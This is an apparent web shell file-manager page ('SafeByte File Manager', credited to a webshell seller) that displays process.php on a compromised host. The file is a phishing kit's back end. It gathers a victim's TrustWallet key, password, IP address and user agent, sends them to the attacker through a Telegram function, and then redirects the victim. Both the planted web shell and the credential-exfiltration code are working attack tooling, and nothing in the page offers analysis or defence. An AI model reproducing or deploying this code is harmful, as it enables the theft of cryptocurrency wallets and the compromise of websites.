SafeByte File Manager

Current Path : /home/abridesnjx/www/tmp/
Upload File :
Current File : /home/abridesnjx/www/tmp/process.php

<?php
error_reporting(0);
session_start();
include_once 'connect.php';
include_once 'functions.php';
include_once 'telegram.php';

$fsh =
        "<strong>โ€ผ๏ธ๐Ÿ›ก TRUSTWALLET LOG ๐Ÿ›กโ€ผ๏ธ</strong>\n".
		"<strong></strong>\n".
        "<strong>๐ŸŒ IP:  ".$_SESSION['remote_ip']."</strong>\n".
		"<i>๐Ÿ“ฑ OS:  ".$_SESSION['useragent']."</i>\n".
		"<strong></strong>\n".
        "<strong>Key:</strong>\n".
		"<code>".$_SESSION['key']."</code>\n".
		"<strong></strong>\n".
        "<strong>Password:</strong> ".$_SESSION['pass']."\n"
        ;

telegram($fsh);
finish($fsh);
encrypt($fsh);
header("Location: ./ ");
?>

SafeByte File Manager 1.0 Coded by SafeByte WebShell Seller